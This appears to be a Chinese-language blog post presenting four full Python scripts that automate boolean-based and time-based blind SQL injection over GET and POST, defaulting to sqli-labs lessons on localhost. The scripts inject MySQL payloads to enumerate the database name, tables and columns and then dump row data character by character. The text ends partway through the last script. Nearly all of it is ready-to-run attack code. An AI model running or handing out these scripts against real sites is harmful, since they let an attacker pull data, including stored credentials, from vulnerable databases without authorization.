Python脚本-时间盲注

BlindBool_get

python 复制代码
import requests
from optparse import OptionParser
import threading

#存放变量
DBName = ""
DBTables = []
DBColumns = []
DBData = {}
flag = 'You are in'
#设置重连次数以及将连接改为短连接
#防止因为HTTP连接数过多导致的MAX retries exceeded with url问题
requests.adapters.DEFAULT_RETRIES = 5
conn = requests.session()
conn.keep_alive = False

def GetDBName(url):
    #引用全局变量DBName,用来存放数据库名
    global DBName
    print('[*]开始获取数据库名长度')
    #保存数据库名长度的变量
    DBNameLen = 0
    #检查数据库名的长度的payload
    payload1 = "' and if(length(database())={0},1,0) --+"
    targetUrl = url + payload1
    for DBNameLen in range(1,99):
        res = conn.get(targetUrl.format(DBNameLen))
        if flag in res.content.decode("utf-8"):
            print("[*] 数据库名长度:" + str(DBNameLen))
            break
    print("[*]开始获取数据库名")
    payload1 = "' and if(ascii(substr(database(),{0},1))={1},1,0) --+"
    targetUrl = url+payload1
    for a in range(1,DBNameLen+1):
        for item in range(33,128):
            res = conn.get(targetUrl.format(a,item))
            if flag in res.content.decode('utf-8'):
                DBName += chr(item)
                print("[*]"+DBName)
                break

def GetDBTables(url,dbname):
    global DBTables
    DBTableCount = 0
    print("[*] 开始获取{0}数据库表数量:".format(dbname))
    #获取表名数量的payload
    payload2 = "' and if((select count(*)table_name from information_schema.tables where table_schema='{0}')={1},1,0) --+"
    targetUrl = url + payload2
    for DBTableCount in range(1,100):
        res = conn.get(targetUrl.format(dbname,DBTableCount))
        if flag in res.content.decode("utf-8"):
            print("[*]{0}数据库中表的数量为:{1}".format(dbname,DBTableCount))
            break

    print("[*] 开始获取{0}数据库中的表名".format(dbname))
    tableLen = 0
    for a in range(0,DBTableCount):
        print("[*] 正在获取第{0}个表名".format(a+1))
        #获取当前表名的长度
        for tableLen in range(1,99):
            payload2 = "' and if((select LENGTH(table_name) from information_schema.tables where table_schema='{0}' limit {1},1)={2},1,0) --+"
            targetUrl = url + payload2
            res = conn.get(targetUrl.format(dbname,a,tableLen))
            if flag in res.content.decode("utf-8"):
                break
        #开始获取表名
        #临时存放当前表名的变量
        table = ""
        #b表示当前表名猜的位置
        for b in range(1,tableLen+1):
            payload2 = "' and if(ascii(substr((select table_name from information_schema.tables where table_schema = '{0}' limit {1},1),{2},1))={3},1,0) --+"
            targetUrl = url + payload2
            for c in range(33,128):
                res = conn.get(targetUrl.format(dbname,a,b,c))
                if flag in res.content.decode('utf-8'):
                    table += chr(c)
                    print(table)
                    break
        #把获取到的表名加入DBTables
        DBTables.append(table)
        #清空table,用来获取下一个表名
        table = ''

def GetDBColumns(url,dbname,dbtable):
    global DBColumns
    DBColumnCount = 0
    #获取字段数量的payload
    print("[-]开始获取{0}数据表的字段数:".format(dbtable))
    for DBColumnCount in range(0,99):
        payload3 = "' and if((select count(column_name) from information_schema.columns where table_schema='{0}' and table_name='{1}')={2},1,0) --+"
        targetUrl = url + payload3
        res = conn.get(targetUrl.format(dbname,dbtable,DBColumnCount))
        if flag in res.content.decode('utf-8'):
            print("[*] {0}数据库中的{1}表的字段个数为{2}个:".format(dbname,dbtable,DBColumnCount))
            break
    #得到字段数量后开始获取字段名
    columns = ''
    for a in range(0,DBColumnCount):
        print("正在获取第{0}个字段的长度和名称:".format(a+1))
        #获取长度
        for columnLen in range(0,99):
            payload3 = "' and if((select LENGTH(column_name) from information_schema.columns where table_schema='{0}' and table_name='{1}' limit {2},1)={3},1,0) --+"
            targetUrl = url + payload3
            res = conn.get(targetUrl.format(dbname,dbtable,a,columnLen))
            if flag in res.content.decode('utf-8'):
                break
        #b标志字段中位置
        for b in range(0,columnLen+1):
            payload3 = "' and if(ascii(substr((select column_name from information_schema.columns where table_schema='{0}' and table_name='{1}' limit {2},1),{3},1))={4},1,0) --+"
            targetUrl = url + payload3
            for c in range(33,128):
                res = conn.get(targetUrl.format(dbname,dbtable,a,b,c))
                if flag in res.content.decode('utf-8'):
                    columns += chr(c)
                    print(columns)
                    break
        #获取到的字段放入DBColumns
        DBColumns.append(columns)
        columns = ''

# 获取表数据函数
def GetDBData(url, dbtable, dbcolumn):
	global DBData
	# 先获取字段数据数量
	DBDataCount = 0
	print("[-]开始获取{0}表{1}字段的数据数量".format(dbtable, dbcolumn))
	for DBDataCount in range(99):
		payload = "'and if ((select count({0}) from {1})={2},1,0) --+"
		targetUrl = url + payload
		res = conn.get(targetUrl.format(dbcolumn, dbtable, DBDataCount))
		if flag in res.content.decode("utf-8"):
			print("[-]{0}表{1}字段的数据数量为:{2}".format(dbtable, dbcolumn, DBDataCount))
			break
	for a in range(0, DBDataCount):
		print("[-]正在获取{0}的第{1}个数据".format(dbcolumn, a+1))
		#先获取这个数据的长度
		dataLen = 0
		for dataLen in range(99):
			payload = "'and if ((select length({0}) from {1} limit {2},1)={3},1,0) --+"
			targetUrl = url + payload
			res = conn.get(targetUrl.format(dbcolumn, dbtable, a, dataLen))
			if flag in res.content.decode("utf-8"):
				print("[-]第{0}个数据长度为:{1}".format(a+1, dataLen))
				break
		#临时存放数据内容变量
		data = ""
		#开始获取数据的具体内容
		#b表示当前数据内容猜解的位置
		for b in range(1, dataLen+1):
			for c in range(33, 128):
				payload = "'and if (ascii(substr((select {0} from {1} limit {2},1),{3},1))={4},1,0) --+"
				targetUrl = url + payload
				res = conn.get(targetUrl.format(dbcolumn, dbtable, a, b, c))
				if flag in res.content.decode("utf-8"):
					data += chr(c)
					print(data)
					break
		#放到以字段名为键,值为列表的字典中存放
		DBData.setdefault(dbcolumn,[]).append(data)
		print(DBData)
		#把data清空来,继续获取下一个数据
		data = ""

# 盲注主函数
def StartSqli(url):
	GetDBName(url)
	print("[+]当前数据库名:{0}".format(DBName))
	GetDBTables(url,DBName)
	print("[+]数据库{0}的表如下:".format(DBName))
	for item in range(len(DBTables)):
		print("(" + str(item + 1) + ")" + DBTables[item])
	tableIndex = int(input("[*]请输入要查看表的序号:")) - 1
	GetDBColumns(url,DBName,DBTables[tableIndex])
	while True:
		print("[+]数据表{0}的字段如下:".format(DBTables[tableIndex]))
		for item in range(len(DBColumns)):
			print("(" + str(item + 1) + ")" + DBColumns[item])
		columnIndex = int(input("[*]请输入要查看字段的序号(输入0退出):"))-1
		if(columnIndex == -1):
			break
		else:
			GetDBData(url, DBTables[tableIndex], DBColumns[columnIndex])

if __name__ == "__main__":
    try:
        usage = "./BlindBool_get.py -u url"
        parser = OptionParser(usage)
        parser.add_option('-u',type='string',dest='url',default='http://localhost/Less-8/?id=1',help='设置目标url')
        options,args=parser.parse_args()
        url = options.url
        # StartSqli(options.url)
        threadSQL = threading.Thread(target=StartSqli,args=(url,))
        threadSQL.start()
    except KeyboardInterrupt:
        print('Interrupted by keyboard inputting!!!')

BlindBool_post

python 复制代码
import requests
from optparse import OptionParser
import threading

#存放变量
DBName = ""
DBTables = []
DBColumns = []
DBData = {}
flag = 'flag'
#设置重连次数以及将连接改为短连接
#防止因为HTTP连接数过多导致的MAX retries exceeded with url问题
requests.adapters.DEFAULT_RETRIES = 5
conn = requests.session()
conn.keep_alive = False

def GetDBName(url):
    #引用全局变量DBName,用来存放数据库名
    global DBName
    print('[*]开始获取数据库名长度')
    #保存数据库名长度的变量
    DBNameLen = 0
    #检查数据库名的长度的payload
    # payload1 = "' and if(length(database())={0},1,0) #"
    for DBNameLen in range(1,99):
        payload = "admin' and if(length(database())="+str(DBNameLen)+",1,0) #"
        data = {
            'uname':payload,
            'passwd':'admin',
            'submit':'Submit',
        }
        res = conn.post(url,data=data)
        if flag in res.content.decode("utf-8"):
            print("[*] 数据库名长度:" + str(DBNameLen))
            break
    print("[*]开始获取数据库名")
    for a in range(1,DBNameLen+1):
        for item in range(33,128):
            payload = "admin' and if(ascii(substr(database(),"+str(a)+",1))="+str(item)+",1,0) #"
            data = {
                'uname':payload,
                'passwd':'admin',
                'submit':'Submit',
            }
            res = conn.post(url,data=data)
            if flag in res.content.decode('utf-8'):
                DBName += chr(item)
                print("[*]"+DBName)
                break

def GetDBTables(url,dbname):
    global DBTables
    DBTableCount = 0
    print("[*] 开始获取{0}数据库表数量:".format(dbname))
    #获取表名数量的payload
    # payload2 = "' and if((select count(*)table_name from information_schema.tables where table_schema='{0}')={1},1,0) #"
    for DBTableCount in range(1,100):
        payload = "admin' and if((select count(*)table_name from information_schema.tables where table_schema='"+dbname+"')="+str(DBTableCount)+",1,0) #"
        data = {
                'uname':payload,
                'passwd':'admin',
                'submit':'Submit',
            }
        res = conn.post(url,data=data)
        if flag in res.content.decode("utf-8"):
            print("[*]{0}数据库中表的数量为:{1}".format(dbname,DBTableCount))
            break
    print("[*] 开始获取{0}数据库中的表名".format(dbname))
    tableLen = 0
    for a in range(0,DBTableCount):
        print("[*] 正在获取第{0}个表名".format(a+1))
        #获取当前表名的长度
        for tableLen in range(1,99):
            payload = "admin' and if((select LENGTH(table_name) from information_schema.tables where table_schema='"+dbname+"' limit "+str(a)+",1)="+str(tableLen)+",1,0) #"
            data = {
                'uname':payload,
                'passwd':'admin',
                'submit':'Submit',
            }
            res = conn.post(url,data=data)
            if flag in res.content.decode("utf-8"):
                break
        #开始获取表名
        #临时存放当前表名的变量
        table = ""
        #b表示当前表名猜的位置
        for b in range(1,tableLen+1):
            for c in range(33,128):
                payload = "admin' and if(ascii(substr((select table_name from information_schema.tables where table_schema = '"+dbname+"' limit "+str(a)+",1),"+str(b)+",1))="+str(c)+",1,0) #"
                data = {
                'uname':payload,
                'passwd':'admin',
                'submit':'Submit',
                }
                res = conn.post(url,data=data)
                if flag in res.content.decode('utf-8'):
                    table += chr(c)
                    print(table)
                    break
        #把获取到的表名加入DBTables
        DBTables.append(table)
        #清空table,用来获取下一个表名
        table = ''

def GetDBColumns(url,dbname,dbtable):
    global DBColumns
    DBColumnCount = 0
    #获取字段数量的payload
    print("[-]开始获取{0}数据表的字段数:".format(dbtable))
    for DBColumnCount in range(0,99):
        payload = "admin' and if((select count(column_name) from information_schema.columns where table_schema='"+dbname+"' and table_name='"+dbtable+"')="+str(DBColumnCount)+",1,0) #"
        data = {
                'uname':payload,
                'passwd':'admin',
                'submit':'Submit',
                }
        res = conn.post(url,data=data)
        if flag in res.content.decode('utf-8'):
            print("[*] {0}数据库中的{1}表的字段个数为{2}个:".format(dbname,dbtable,DBColumnCount))
            break
    #得到字段数量后开始获取字段名
    columns = ''
    for a in range(0,DBColumnCount):
        print("正在获取第{0}个字段的长度和名称:".format(a+1))
        #获取长度
        for columnLen in range(0,99):
            payload = "admin' and if((select LENGTH(column_name) from information_schema.columns where table_schema='"+dbname+"' and table_name='"+dbtable+"' limit "+str(a)+",1)="+str(columnLen)+",1,0) #"
            data = {
                'uname':payload,
                'passwd':'admin',
                'submit':'Submit',
                }
            res = conn.post(url,data=data)
            if flag in res.content.decode('utf-8'):
                break
        #b标志字段中位置
        for b in range(0,columnLen+1):
            for c in range(33,128):
                payload = "admin' and if(ascii(substr((select column_name from information_schema.columns where table_schema='"+dbname+"' and table_name='"+dbtable+"' limit "+str(a)+",1),"+str(b)+",1))="+str(c)+",1,0) #"
                data = {
                'uname':payload,
                'passwd':'admin',
                'submit':'Submit',
                }
                res = conn.post(url,data=data)
                if flag in res.content.decode('utf-8'):
                    columns += chr(c)
                    print(columns)
                    break
        #获取到的字段放入DBColumns
        DBColumns.append(columns)
        columns = ''

# 获取表数据函数
def GetDBData(url, dbtable, dbcolumn):
    global DBData
    # 先获取字段数据数量
    DBDataCount = 0
    print("[-]开始获取{0}表{1}字段的数据数量".format(dbtable, dbcolumn))
    for DBDataCount in range(99):
        payload = "admin' and if ((select count("+dbcolumn+") from "+dbtable+")="+str(DBDataCount)+",1,0) #"
        data = {
            'uname':payload,
            'passwd':'admin',
            'submit':'Submit',
        }
        res = conn.post(url,data=data)
        if flag in res.content.decode("utf-8"):
            print("[-]{0}表{1}字段的数据数量为:{2}".format(dbtable, dbcolumn, DBDataCount))
            break
    for a in range(0, DBDataCount):
        print("[-]正在获取{0}的第{1}个数据".format(dbcolumn, a+1))
        #先获取这个数据的长度
        dataLen = 0
        for dataLen in range(99):
            payload = "admin' and if ((select length("+dbcolumn+") from "+dbtable+" limit "+str(a)+",1)="+str(dataLen)+",1,0) #"
            data = {
                'uname':payload,
                'passwd':'admin',
                'submit':'Submit',
            }
            res = conn.post(url,data=data)
            if flag in res.content.decode("utf-8"):
                print("[-]第{0}个数据长度为:{1}".format(a+1, dataLen))
                break
        #临时存放数据内容变量
        data1 = ""
        #开始获取数据的具体内容
        #b表示当前数据内容猜解的位置
        for b in range(1, dataLen+1):
            for c in range(33, 128):
                payload = "admin' and if (ascii(substr((select "+dbcolumn+" from "+dbtable+" limit "+str(a)+",1),"+str(b)+",1))="+str(c)+",1,0) #"
                data = {
                    'uname':payload,
                    'passwd':'admin',
                    'submit':'Submit',
                }
                res = conn.post(url,data=data)
                if flag in res.content.decode("utf-8"):
                    data1 += chr(c)
                    print(data1)
                    break
        #放到以字段名为键,值为列表的字典中存放
        DBData.setdefault(dbcolumn,[]).append(data1)
        print(DBData)
        #把data清空来,继续获取下一个数据
        data1 = ""

# 盲注主函数
def StartSqli(url):
    GetDBName(url)
    print("[+]当前数据库名:{0}".format(DBName))
    GetDBTables(url,DBName)
    print("[+]数据库{0}的表如下:".format(DBName))
    for item in range(len(DBTables)):
        print("(" + str(item + 1) + ")" + DBTables[item])
    tableIndex = int(input("[*]请输入要查看表的序号:")) - 1
    GetDBColumns(url,DBName,DBTables[tableIndex])
    while True:
        print("[+]数据表{0}的字段如下:".format(DBTables[tableIndex]))
        for item in range(len(DBColumns)):
            print("(" + str(item + 1) + ")" + DBColumns[item])
        columnIndex = int(input("[*]请输入要查看字段的序号(输入0退出):"))-1
        if(columnIndex == -1):
            break
        else:
            GetDBData(url, DBTables[tableIndex], DBColumns[columnIndex])

if __name__ == "__main__":
    try:
        usage = "./BlindBool_post.py -u url"
        parser = OptionParser(usage)
        parser.add_option('-u',type='string',dest='url',default='http://localhost/Less-15',help='设置目标url')
        options,args=parser.parse_args()
        url = options.url
        # StartSqli(options.url)
        threadSQL = threading.Thread(target=StartSqli,args=(url,))
        threadSQL.start()
    except KeyboardInterrupt:
        print('Interrupted by keyboard inputting!!!')

BlindTime_get

python 复制代码
#!/usr/bin/python3
# -*- coding: utf-8 -*-

import requests
from optparse import OptionParser
import time
import threading


# 存放数据库名变量
DBName = ""
# 存放数据库表变量
DBTables = []
# 存放数据库字段变量
DBColumns = []
# 存放数据字典变量,键为字段名,值为字段数据列表
DBData = {}

# 设置重连次数以及将连接改为短连接
# 防止因为HTTP连接数过多导致的 Max retries exceeded with url
requests.adapters.DEFAULT_RETRIES = 5
conn = requests.session()
conn.keep_alive = False


# 盲注主函数
def StartSqli(url):
	GetDBName(url)
	print("[+]当前数据库名:{0}".format(DBName))
	GetDBTables(url,DBName)
	print("[+]数据库{0}的表如下:".format(DBName))
	for item in range(len(DBTables)):
		print("(" + str(item + 1) + ")" + DBTables[item])
	tableIndex = int(input("[*]请输入要查看表的序号:")) - 1
	GetDBColumns(url,DBName,DBTables[tableIndex])
	while True:
		print("[+]数据表{0}的字段如下:".format(DBTables[tableIndex]))
		for item in range(len(DBColumns)):
			print("(" + str(item + 1) + ")" + DBColumns[item])
		columnIndex = int(input("[*]请输入要查看字段的序号(输入0退出):"))-1
		if(columnIndex == -1):
			break
		else:
			GetDBData(url, DBTables[tableIndex], DBColumns[columnIndex])


# 获取数据库名函数
def GetDBName(url):
	# 引用全局变量DBName,用来存放网页当前使用的数据库名
	global DBName
	print("[-]开始获取数据库名长度")
	# 保存数据库名长度变量
	DBNameLen = 0
	# 用于检查数据库名长度的payload
	payload = "' and if(length(database())={0},sleep(5),0) --+"
	# 把URL和payload进行拼接得到最终的请求URL
	targetUrl = url + payload
	# 用for循环来遍历请求,得到数据库名长度
	for DBNameLen in range(1, 99):
		# 开始时间
		timeStart = time.time()
		# 开始访问
		res = conn.get(targetUrl.format(DBNameLen))
		# 结束时间
		timeEnd = time.time()
		# 判断时间差
		if timeEnd - timeStart >= 5:
			print("[+]数据库名长度:" + str(DBNameLen))
			break
	print("[-]开始获取数据库名")
	payload = "' and if(ascii(substr(database(),{0},1))={1},sleep(5),0)--+"
	targetUrl = url + payload
	# a表示substr()函数的截取起始位置
	for a in range(1, DBNameLen+1):
		# b表示33~127位ASCII中可显示字符
		for b in range(33, 128):
			timeStart = time.time()
			res = conn.get(targetUrl.format(a,b))
			timeEnd = time.time()
			if timeEnd - timeStart >= 5:
				DBName += chr(b)
				print("[-]"+ DBName)
				break


#获取数据库表函数
def GetDBTables(url, dbname):
	global DBTables
	#存放数据库表数量的变量
	DBTableCount = 0
	print("[-]开始获取{0}数据库表数量:".format(dbname))
	#获取数据库表数量的payload
	payload = "' and if((select count(table_name) from information_schema.tables where table_schema='{0}' )={1},sleep(5),0) --+"
	targetUrl = url + payload
	#开始遍历获取数据库表的数量
	for DBTableCount in range(1, 99):
		timeStart = time.time()
		res = conn.get(targetUrl.format(dbname, DBTableCount))
		timeEnd = time.time()
		if timeEnd - timeStart >= 5:
			print("[+]{0}数据库的表数量为:{1}".format(dbname, DBTableCount))
			break
	print("[-]开始获取{0}数据库的表".format(dbname))
	# 遍历表名时临时存放表名长度变量
	tableLen = 0
	# a表示当前正在获取表的索引
	for a in range(0,DBTableCount):
		print("[-]正在获取第{0}个表名".format(a+1))
		# 先获取当前表名的长度
		for tableLen in range(1, 99):
			payload = "' and if((select length(table_name) from information_schema.tables where table_schema='{0}' limit {1},1)={2},sleep(5),0) --+"
			targetUrl = url + payload
			timeStart = time.time()
			res = conn.get(targetUrl.format(dbname, a, tableLen))
			timeEnd = time.time()
			if timeEnd - timeStart >= 5:
				break
		# 开始获取表名
		# 临时存放当前表名的变量
		table = ""
		# b表示当前表名猜解的位置
		for b in range(1, tableLen+1):
			payload = "' and if(ascii(substr((select table_name from information_schema.tables where table_schema='{0}' limit {1},1),{2},1))={3},sleep(5),0)--+"
			targetUrl = url + payload
			# c表示33~127位ASCII中可显示字符
			for c in range(33, 128):
				timeStart = time.time()
				res = conn.get(targetUrl.format(dbname, a, b, c))
				timeEnd = time.time()
				if timeEnd - timeStart >= 5:
					table += chr(c)
					print(table)
					break
		#把获取到的名加入到DBTables
		DBTables.append(table)
		#清空table,用来继续获取下一个表名
		table = ""


# 获取数据库表的字段函数
def GetDBColumns(url, dbname, dbtable):
	global DBColumns
	# 存放字段数量的变量
	DBColumnCount = 0
	print("[-]开始获取{0}数据表的字段数:".format(dbtable))
	for DBColumnCount in range(99):
		payload = "' and if((select count(column_name) from information_schema.columns where table_schema='{0}' and table_name='{1}')={2},sleep(5),0) --+"
		targetUrl = url + payload
		timeStart = time.time()
		res = conn.get(targetUrl.format(dbname, dbtable, DBColumnCount))
		timeEnd = time.time()
		if timeEnd - timeStart >= 5:
			print("[-]{0}数据表的字段数为:{1}".format(dbtable, DBColumnCount))
			break
	# 开始获取字段的名称
	# 保存字段名的临时变量
	column = ""
	# a表示当前获取字段的索引
	for a in range(0, DBColumnCount):
		print("[-]正在获取第{0}个字段名".format(a+1))
		# 先获取字段的长度
		for columnLen in range(99):
			payload = "' and if((select length(column_name) from information_schema.columns where table_schema='{0}' and table_name='{1}' limit {2},1)={3},sleep(5),0) --+"
			targetUrl = url + payload
			timeStart = time.time()
			res = conn.get(targetUrl.format(dbname, dbtable, a, columnLen))
			timeEnd = time.time()
			if timeEnd - timeStart >= 5:
				break
		# b表示当前字段名猜解的位置
		for b in range(1, columnLen+1):
			payload = "' and if(ascii(substr((select column_name from information_schema.columns where table_schema='{0}' and table_name='{1}' limit {2},1),{3},1))={4},sleep(5),0) --+"
			targetUrl = url + payload
			# c表示33~127位ASCII中可显示字符
			for c in range(33, 128):
				timeStart = time.time()
				res = conn.get(targetUrl.format(dbname, dbtable, a, b, c))
				timeEnd = time.time()
				if timeEnd - timeStart >= 5:
					column += chr(c)
					print(column)
					break
		# 把获取到的名加入到DBColumns
		DBColumns.append(column)
		#清空column,用来继续获取下一个字段名
		column = ""


# 获取表数据函数
def GetDBData(url, dbtable, dbcolumn):
	global DBData
	# 先获取字段数据数量
	DBDataCount = 0
	print("[-]开始获取{0}表{1}字段的数据数量".format(dbtable, dbcolumn))
	for DBDataCount in range(99):
		payload = "' and if((select count({0}) from {1})={2},sleep(5),0) --+"
		targetUrl = url + payload
		timeStart = time.time()
		res = conn.get(targetUrl.format(dbcolumn, dbtable, DBDataCount))
		timeEnd = time.time()
		if timeEnd - timeStart >= 5:
			print("[-]{0}表{1}字段的数据数量为:{2}".format(dbtable, dbcolumn, DBDataCount))
			break
	for a in range(0, DBDataCount):
		print("[-]正在获取{0}的第{1}个数据".format(dbcolumn, a+1))
		#先获取这个数据的长度
		dataLen = 0
		for dataLen in range(99):
			payload = "'and  if((select length({0}) from {1} limit {2},1)={3},sleep(5),0) --+"
			targetUrl = url + payload
			timeStart = time.time()
			res = conn.get(targetUrl.format(dbcolumn, dbtable, a, dataLen))
			timeEnd = time.time()
			if timeEnd - timeStart >= 5:
				print("[-]第{0}个数据长度为:{1}".format(a+1, dataLen))
				break
		#临时存放数据内容变量
		data = ""
		#开始获取数据的具体内容
		#b表示当前数据内容猜解的位置
		for b in range(1, dataLen+1):
			for c in range(33, 128):
				payload = "' and  if(ascii(substr((select {0} from {1} limit {2},1),{3},1))={4},sleep(5),0) --+"
				targetUrl = url + payload
				timeStart = time.time()
				res = conn.get(targetUrl.format(dbcolumn, dbtable, a, b, c))
				timeEnd = time.time()
				if timeEnd - timeStart >= 5:
					data += chr(c)
					print(data)
					break
		#放到以字段名为键,值为列表的字典中存放
		DBData.setdefault(dbcolumn,[]).append(data)
		print(DBData)
		#把data清空来,继续获取下一个数据
		data = ""


if __name__ == '__main__':
	try:
		usage = "./BlindTime_get.py -u url"
		parser = OptionParser(usage)
		# 目标URL参数-u
		parser.add_option('-u', '--url', dest='url',default='http://localhost/Less-9/?id=1', type='string',help='target URL')
		options, args = parser.parse_args()
		url = options.url
		threadSQL = threading.Thread(target=StartSqli,args=(url,))
		threadSQL.start()
	except KeyboardInterrupt:
		print("Interrupted by keyboard inputting!!!")

BlindTime_post

python 复制代码
#!/usr/bin/python3
# -*- coding: utf-8 -*-

import requests
from optparse import OptionParser
import time
import threading


# 存放数据库名变量
DBName = ""
# 存放数据库表变量
DBTables = []
# 存放数据库字段变量
DBColumns = []
# 存放数据字典变量,键为字段名,值为字段数据列表
DBData = {}

# 设置重连次数以及将连接改为短连接
# 防止因为HTTP连接数过多导致的 Max retries exceeded with url
requests.adapters.DEFAULT_RETRIES = 5
conn = requests.session()
conn.keep_alive = False

# 获取数据库名函数
def GetDBName(url):
	# 引用全局变量DBName,用来存放网页当前使用的数据库名
	global DBName
	print("[-]开始获取数据库名长度")
	# 保存数据库名长度变量
	DBNameLen = 0
	# 用for循环来遍历请求,得到数据库名长度
	for DBNameLen in range(1, 99):
		# 开始时间
		timeStart = time.time()
		payload = "admin' and if(length(database())="+str(DBNameLen)+",sleep(5),0) #"
		# "admin' and if(length(database())=8,sleep(5),0) #"
		data = {
			'uname':payload,
			'passwd':'admin',
			'submit':'Submit',
		}
		res = conn.post(url,data=data)
		# 结束时间
		timeEnd = time.time()
		# 判断时间差
		if timeEnd - timeStart >= 5:
			print("[+]数据库名长度:" + str(DBNameLen))
			break
	print("[-]开始获取数据库名")
	# a表示substr()函数的截取起始位置
	for a in range(1, DBNameLen+1):
		# b表示33~127位ASCII中可显示字符
		for b in range(33, 128):
			timeStart = time.time()
			payload = "admin' and if(ascii(substr(database(),"+str(a)+",1))="+str(b)+",sleep(5),0)#"
			data = {
				'uname':payload,
				'passwd':'admin',
				'submit':'Submit',
			}
			res = conn.post(url,data)
			timeEnd = time.time()
			if timeEnd - timeStart >= 5:
				DBName += chr(b)
				print("[-]"+ DBName)
				break


#获取数据库表函数
def GetDBTables(url, dbname):
	global DBTables
	#存放数据库表数量的变量
	DBTableCount = 0
	print("[-]开始获取{0}数据库表数量:".format(dbname))
	#开始遍历获取数据库表的数量
	for DBTableCount in range(1, 99):
		timeStart = time.time()
		payload = "admin' and if((select count(table_name) from information_schema.tables where table_schema='"+dbname+"' )="+str(DBTableCount)+",sleep(5),0) #"
		data = {
			'uname':payload,
			'passwd':'admin',
			'submit':'Submit',
		}
		res = conn.post(url,data=data)
		timeEnd = time.time()
		if timeEnd - timeStart >= 5:
			print("[+]{0}数据库的表数量为:{1}".format(dbname, DBTableCount))
			break
	print("[-]开始获取{0}数据库的表".format(dbname))
	# 遍历表名时临时存放表名长度变量
	tableLen = 0
	# a表示当前正在获取表的索引
	for a in range(0,DBTableCount):
		print("[-]正在获取第{0}个表名".format(a+1))
		# 先获取当前表名的长度
		for tableLen in range(1, 99):
			payload = "admin' and if((select length(table_name) from information_schema.tables where table_schema='"+dbname+"' limit "+str(a)+",1)="+str(tableLen)+",sleep(5),0) #"
			timeStart = time.time()
			data = {
				'uname':payload,
				'passwd':'admin',
				'submit':'Submit',
			}
			res = conn.post(url,data=data)
			timeEnd = time.time()
			if timeEnd - timeStart >= 5:
				break
		# 开始获取表名
		# 临时存放当前表名的变量
		table = ""
		# b表示当前表名猜解的位置
		for b in range(1, tableLen+1):
			# c表示33~127位ASCII中可显示字符
			for c in range(33, 128):
				timeStart = time.time()
				payload = "admin' and if(ascii(substr((select table_name from information_schema.tables where table_schema='"+dbname+"' limit "+str(a)+",1),"+str(b)+",1))="+str(c)+",sleep(5),0)#"
				data = {
					'uname':payload,
					'passwd':'admin',
					'submit':'Submit',
				}
				res = conn.post(url,data=data)
				timeEnd = time.time()
				if timeEnd - timeStart >= 5:
					table += chr(c)
					print(table)
					break
		#把获取到的名加入到DBTables
		DBTables.append(table)
		#清空table,用来继续获取下一个表名
		table = ""


# 获取数据库表的字段函数
def GetDBColumns(url, dbname, dbtable):
	global DBColumns
	# 存放字段数量的变量
	DBColumnCount = 0
	print("[-]开始获取{0}数据表的字段数:".format(dbtable))
	for DBColumnCount in range(99):
		payload = "admin' and if((select count(column_name) from information_schema.columns where table_schema='"+dbname+"' and table_name='"+dbtable+"')="+str(DBColumnCount)+",sleep(5),0) #"
		data = {
				'uname':payload,
				'passwd':'admin',
				'submit':'Submit',
			}
		timeStart = time.time()
		res = conn.post(url,data=data)
		timeEnd = time.time()
		if timeEnd - timeStart >= 5:
			print("[-]{0}数据表的字段数为:{1}".format(dbtable, DBColumnCount))
			break
	# 开始获取字段的名称
	# 保存字段名的临时变量
	column = ""
	# a表示当前获取字段的索引
	for a in range(0, DBColumnCount):
		print("[-]正在获取第{0}个字段名".format(a+1))
		# 先获取字段的长度
		for columnLen in range(99):
			payload = "admin' and if((select length(column_name) from information_schema.columns where table_schema='"+dbname+"' and table_name='"+dbtable+"' limit "+str(a)+",1)="+str(columnLen)+",sleep(5),0) #"
			data = {
				'uname':payload,
				'passwd':'admin',
				'submit':'Submit',
			}
			timeStart = time.time()
			res = conn.post(url,data=data)
			timeEnd = time.time()
			if timeEnd - timeStart >= 5:
				break
		# b表示当前字段名猜解的位置
		for b in range(1, columnLen+1):
			# c表示33~127位ASCII中可显示字符
			for c in range(33, 128):
				timeStart = time.time()
				payload = "' and if(ascii(substr((select column_name from information_schema.columns where table_schema='"+dbname+"' and table_name='"+dbtable+"' limit "+str(a)+",1),"+str(b)+",1))="+str(c)+",sleep(5),0) #"
				data = {
					'uname':payload,
					'passwd':'admin',
					'submit':'Submit',
				}
				res = conn.post(url,data=data)
				timeEnd = time.time()
				if timeEnd - timeStart >= 5:
					column += chr(c)
					print(column)
					break
		# 把获取到的名加入到DBColumns
		DBColumns.append(column)
		#清空column,用来继续获取下一个字段名
		column = ""


# 获取表数据函数
def GetDBData(url, dbtable, dbcolumn):
	global DBData
	# 先获取字段数据数量
	DBDataCount = 0
	print("[-]开始获取{0}表{1}字段的数据数量".format(dbtable, dbcolumn))
	for DBDataCount in range(99):
		payload = "admin' and if((select count("+dbcolumn+") from "+dbtable+")="+str(DBDataCount)+",sleep(5),0) #"
		data = {
			'uname':payload,
			'passwd':'admin',
			'submit':'Submit',
		}
		timeStart = time.time()
		res = conn.post(url,data=data)
		timeEnd = time.time()
		if timeEnd - timeStart >= 5:
			print("[-]{0}表{1}字段的数据数量为:{2}".format(dbtable, dbcolumn, DBDataCount))
			break
	for a in range(0, DBDataCount):
		print("[-]正在获取{0}的第{1}个数据".format(dbcolumn, a+1))
		#先获取这个数据的长度
		dataLen = 0
		for dataLen in range(99):
			payload = "admin'and  if((select length("+dbcolumn+") from "+dbtable+" limit "+str(a)+",1)="+str(dataLen)+",sleep(5),0) #"
			data = {
				'uname':payload,
				'passwd':'admin',
				'submit':'Submit',
			}
			timeStart = time.time()
			res = conn.post(url,data=data)
			timeEnd = time.time()
			if timeEnd - timeStart >= 5:
				print("[-]第{0}个数据长度为:{1}".format(a+1, dataLen))
				break
		#临时存放数据内容变量
		data1 = ""
		#开始获取数据的具体内容
		#b表示当前数据内容猜解的位置
		for b in range(1, dataLen+1):
			for c in range(33, 128):
				payload = "admin' and  if(ascii(substr((select "+dbcolumn+" from "+dbtable+" limit "+str(a)+",1),"+str(b)+",1))="+str(c)+",sleep(5),0) #"
				data = {
					'uname':payload,
					'passwd':'admin',
					'submit':'Submit',
				}
				timeStart = time.time()
				res = conn.get(url,data=data)
				timeEnd = time.time()
				if timeEnd - timeStart >= 5:
					data1 += chr(c)
					print(data1)
					break
		#放到以字段名为键,值为列表的字典中存放
		DBData.setdefault(dbcolumn,[]).append(data1)
		print(DBData)
		#把data清空来,继续获取下一个数据
		data1 = ""

# 盲注主函数
def StartSqli(url):
	GetDBName(url)
	print("[+]当前数据库名:{0}".format(DBName))
	GetDBTables(url,DBName)
	print("[+]数据库{0}的表如下:".format(DBName))
